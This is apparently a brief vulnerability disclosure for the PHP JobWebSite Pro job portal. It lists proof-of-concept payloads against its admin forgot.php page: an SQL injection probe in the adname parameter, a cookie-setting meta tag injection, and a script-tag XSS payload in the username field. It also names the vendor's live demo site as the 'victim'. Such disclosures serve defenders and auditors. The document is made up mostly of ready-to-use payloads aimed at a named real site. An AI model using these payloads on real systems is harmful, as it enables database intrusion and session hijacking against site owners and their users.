PHP JobWebSite Pro suffers from cookie manipulation, cross site scripting, and remote SQL injection vulnerabilities.
611d428dde8396813f5bcb03ddedad7254e6b00f222a3506de9e858beee16ee3
#########################################################
---------------------------------------------------------
Portal Name: PHP JOBWEBSITE PRO
Vendor : http://preproject.com
Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (CM,XSS,SQL)
---------------------------------------------------------
#########################################################
[SQL]:
http://site.com/[Path]/siteadmin/forgot.php?adname=SQL'"&fu=Submit
[Cookie Manipulation]:
http://site.com/[Path]/siteadmin/forgot.php?adname=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>&fu=Submit
[XSS]:
http:///site/[Path]/siteadmin/forgot.php
UserName:<script>alert(1369)</script>
---------------------------------
Victem :
http://preproject.com/jobpro/